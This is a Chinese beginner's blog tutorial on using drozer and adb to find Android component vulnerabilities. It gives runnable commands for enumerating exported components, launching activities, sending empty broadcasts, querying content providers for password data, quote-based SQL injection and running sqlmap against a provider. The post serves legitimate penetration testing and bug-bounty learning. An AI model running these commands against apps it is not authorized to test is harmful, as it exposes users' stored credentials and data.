几条命令用drozer挖漏洞(0基础)

最新推荐文章于 2025-06-16 11:44:27 发布
最新推荐文章于 2025-06-16 11:44:27 发布
阅读量1.7k 收藏 9
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 安卓安全 文章标签: drozer app安全 漏洞 新手
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sun8890446/article/details/89668515
本文针对新手介绍了如何使用Drozer工具挖掘Android应用的组件漏洞,包括数据备份与恢复、本地拒绝服务及SQL注入等。通过具体步骤指导如何连接设备、启动Drozer Agent,并利用命令行工具扫描应用包,获取组件信息,测试潜在的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

之前介绍过怎么安装drozer(drozer工具安装),本次主要面对于没有基础的新手,怎么用几条命令挖简单的组件漏洞(大部分为中危),经初次工具的使用练习,比较好挖的漏洞主要有,allowback(数据备份与恢复)、本地拒绝服务、本地sql注入。附个最近挖的部分垃圾洞:

1.磨枪上阵!

第一步:adb连接手机或者模拟器(看你心情爱用哪个用哪个)

(1)我的三星s8+需要打开usb调试,然后连接数据线后同意电脑访问设备数据,在usb连接选项处选择MIDI。

(2)夜神模拟器需要:

adb connect 127.0.0.1:62001 //adb目录下,连接夜神模拟器

连接好手机或者模拟器后查看是否连接到了设备:

adb devices      //adb目录下

第二步:打开手机端的drozer agent app,点击右下角开启,此时agent开始监听31415端口,我们用adb转发这个端口出来,连接drozer:

adb forward tcp:31415 tcp:31415  //adb目录下,进行端口转发

drozer console connect                      //drozer目录下,连接drozer agent

2.挖洞正题!

统计一下挖简单的漏洞我们要用到的命令:

run app.package.list                   //列出手机内安装的所有应用包名

run app.package.llst -f xxxx       //过滤出有指定关键字的包名

run app.package.attacksurface   com.example.sieve   //扫描攻击面,暴露了什么组件,此处以com.example.sieve包为例。

run app.activity.info -a com.example.sieve   //获取avtivity信息

run app.broadcast.info -a com.example.sieve   //获取broadcast信息

run app.provider.info -a com.example.sieve  //获取provider信息

run app.service.info -a com.example.sieve  //获取service信息

run app.activity.start --component  com.example.sieve  com.example.sieve.activity //启动某activity组件,调出越权界面或者应用崩溃存在漏洞。

run app.broadcast.send  --component  com.example.sieve  com.example.sieve.broadcast //发送空intent给广播组件,应用崩溃存在漏洞。

run scanner.provider.finduris -a  com.example.sieve //获取可以访问的uri

run app.provider.query content://com.example.sieve.xx.xxxxx/passwords --vertical  //获取uri的数据,查询到敏感数据存在漏洞。

run app.provider.query content://com.example.sieve.DBcontentprovider/password/ --projection "'" 

run app.provider.query content://com.example.sieve.DBcontentprovider/password/ --selection "'"  //输入’ 参数进行注入,报错了的话存在漏洞,可以继续使用手工注入查询数据库内容,也可使用sqlmap:

run auxiliary.webcontentresolver   //转发tcp:8080到本机,测试期间不要ctrl+c停止转发

用电脑访问:http://localhost:8080/query?uri=content://com.example.sieve.DBcontentprovider/password/&projection=*

直接sqlmap跑:

sqlmap -u "http://localhost:8080/query?uri=content://com.example.sieve.DBcontentprovider/password/&projection=*" --dbs   

//参考sqlmap的基本使用

 

之后会整理完整的drozer使用方法, 如果有其它适合新手的简单操作的建议请大家评论帮忙哦,我持续更新~

 

 

白帽子Android渗透测试指南
AI天才研究院
08-06 1421
随着智能手机的普及和移动互联网的快速发展,Android系统作为全球市场占有率最高的移动操作系统,其安全性越来越受到人们的重视。与此同时,针对Android系统的恶意软件和攻击手段也层出不穷,给用户的信息安全和隐私保护带来了极大的威胁。为了帮助广大开发者和安全爱好者更好地了解Android系统的安全机制,掌握Android渗透测试的基本方法和技巧,本文将从白帽子的角度出发,详细介绍Android渗透测试的流程、技术和工具,并结合实际案例进行分析和讲解。
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 2127
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
APP漏洞掘工具篇 - Drozer
3569
11-27 9290
https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247483830&idx=1&sn=ef4bdcdca99d2928d5a0c3ae246b007f&chksm=fa177d75cd60f4639d0990f7496942a3b39edc41972577590e30a58e501f183bec689ef...
使用drozer掘android漏洞
Tesi1a的充电桩
05-04 2805
0x00 安装环境 Mac OS Mojave Ver 10.14.5 Android 5.1.1 Drozer Ver 2.4.4 、 drozer-2.4.4-py2-none-any.whl 一、mac上安装drozer 二、步骤 1.自行安装 JDK 环境 2.自行安装 Python 2.7 3.自行安装 adb 环境 4.官方网站下载 drozer-2.4.4-py2-none-any...
漏洞是什么意思?漏洞赚钱入门到精通,收藏这篇就够了!
最新发布
chengxuyuanyy的博客
06-16 943
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
Android drozer漏洞检测
xiaolu99999的专栏
09-09 2066
Android drozer漏洞检测
使用Drozer进行安全测试(Drozer github上开源项目)
lostinai的专栏
10-09 5750
在前面的文章中,我们已经介绍了Android的多种安全漏洞,在继续学习其他漏洞之前,我们先来学习一个非常NB的工具:Drozer. Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。 其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。” 在Web世界已经有了许多安全测试工具了,我们只需
安全测试-Drozer安全测试框架实践记录篇
qq_34381178的博客
08-06 5251
二、环境部署一、Drozer简介Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。”在Web世界已经有了许多安全测试工具了,我们只需要给出一个目标,这些工具就会自动为我们安全测试报告。但Drozer与这样的自动化扫描器不同,Drozer是一种交互式的安全测试工具。......
APP测试】Windows下夜神模拟器的Drozer安装与连接
weixin_43486390的博客
09-21 3676
记录一次完整的安装过程,百度了很多教程,愣是把这个弄出来了,重重困难啊差点崩溃,写下来当作自己的笔记! 需要的环境 夜神模拟器 python2.7的环境 Drozer adb,哈哈,我下载了怎么弄都不行,最后干脆没用下载的那个 1、安装夜神模拟器 我的环境win10 官网直接下载安装 https://www.yeshen.com/ 2、下载Drozer 在这之前,需要python(2.7)环境,安装时python记得添加到系统变量中去,也可以桌面→我的电脑→单击右键,属性→高级系统设置→高级→环境变量→系统
【Android系统漏洞扫描】:Kali Linux工具快速入门指南
[【Android系统漏洞扫描】:Kali Linux工具快速入门指南](https://varutra-1a3b6.kxcdn.com/wp-content/webp-express/webp-images/uploads/2021/09/Android-Penetration-Testing-with-Drozer-1024x535.png.webp) ...
Android渗透测试入门教程v2017.2试读陆小马功钟浩.pdf
09-14
包括查看应用程序包内容、使用Dex2jar、Apktool和JD-GUI工具,以及如何对应用程序进行安全审计,如使用Drozer工具进行命令操作和分析Contentprovider组件泄露和遍历文件漏洞。 第3章 流量分析则涵盖了外部式和内部...
《移动安全》(6)使用drozer检测四大组件(下)
午夜安全
10-05 5397
《移动安全》(6)使用drozer检测四大组件(下) 在drozer console中直接使用help查看;然后进一步使用help command可查看各命令更具体的使用方法。通过输入安装包的部分关键字查找包全称 run app.package.list -f 安装包部分关键字run app.package.list -f demo使用app.package.info模块查看apk基本信息run app.package.info -a ...
Android中的组件安全漏洞介绍和检测
热门推荐
nextdoor6的博客
08-22 1万+
首先我们介绍下我们常见的Android的activity组件, Activity是Android四大组件之一,它用于展示界面。Activity是一个应用程序组件,提供一个屏幕,用户可以用来交互为了完成某项任务。Activity中所有操作都与用户密切相关,是一个负责与用户交互的组件,可以通过setContentView(View)来显示指定控件。在一个android应用中,一个Activity通常
移动安全学习笔记——组件安全之组件暴露导致的安全问题(含实验)
0nc3的博客
02-25 1929
0x00 漏洞原理 exported的组件可以被第三方APP调用,在权限控制不当的情况下,可能导致敏感信息泄露、绕过认证、越权行为执行等风险。 0x01 检测方法 1、手动查看 1-反编译apk,查看AndroidManifest.xml。 2-查看组件是否被导出或默认导出。 具有intent-filter标签时,默认为exported=true 不具有intent-filter标签时,默认为exported=false 导出的组件是否有Signature以上级别的权限控制。 2、利用Drozer
安全性测试】drozer中关于AttackSurface的一些理解
weixin_30911451的博客
11-11 311
  在推荐扫描Android APP的工具中,扫描组件可以推荐drozer。使用过drozer的使用者知道,如何查找各个组件上的攻击层面 run app.package.AttackSurface 。   它的原理是在AndroidManifest.xml中检测所有组件是否含有exported 并且为true。且当Android sdk 的最小版本为16或者更低时他的默认值是true。...
百度杯”CTF比赛(十二月场)
Root__Liu的博客
04-13 4224
"百度杯"CTF比赛(十二月场) 第一场 1、传说中的签到题 解决:把二进制用在线进制转换器转换,发现转为10进制时,和tips2一样,在qq上一查,是CTF官方群,在公告里有一个字符串ZmxhZ3tiMTU5MDI4Yy05NWZmLTRmNzEtYWQ3Yi1jZWY1MTBhMjJkMDB9 用base64解码,得到flag, flag{b159028c-95ff-4f
基于模糊测试的漏洞掘及攻防技术
weixin_30871293的博客
05-15 1407
常见漏洞掘技术 手工测试 补丁比对 定义:一种通过对比补丁之间的差异来漏洞的技术。 优点:发现速度快 缺点:已知漏洞 常见工具:PatchDiff2、bindiff 程序分析 静态 定义:是指在不运行计算机程序的条件下,通过词法分析、语法分析、语义分析、控制流分析、污点分析等技术对程序代码进行扫描,验证代码是否满足规范性、安全性等指标的一种代码分析技术。 优点:覆盖率100%,自动...
171009 逆向-实验吧ctf(250re-apk)
whklhhhh的博客
10-10 1292
1625-5 王子昂 总结《2017年10月9日》 【连续第374天总结】 A. 实验吧ctf-re B. android这个题目的分数并不高,但是由于安卓版本问题真是问题频发…… 直接打开程序发现是荡荡的页面 对APK反编译,发现设置了一个Send_to_Activity广播接收函数 当收到”msg”:”OpenSesame”的广播时设置CTFRevceiver 那我们就用adb
APP渗透总结-Drozer使用
「撕掉标签的实践派」​​ —— 拒绝纸上谈兵,所有方案经过真实环境验证
05-23 725
Drozer是一款强大的Android安全测试工具,主要用于分析和测试Android应用的四大组件(Activity、Service、BroadcastReceiver、ContentProvider)的安全性。通过Drozer,用户可以列出设备上的所有应用包名,查看应用的配置信息,分析攻击面,并检测潜在的安全漏洞,如SQL注入和目录遍历。具体命令包括runapp.package.list列出所有应用包名,runapp.package.attacksurface分析攻击面,runscanner.provid
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

devi1.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值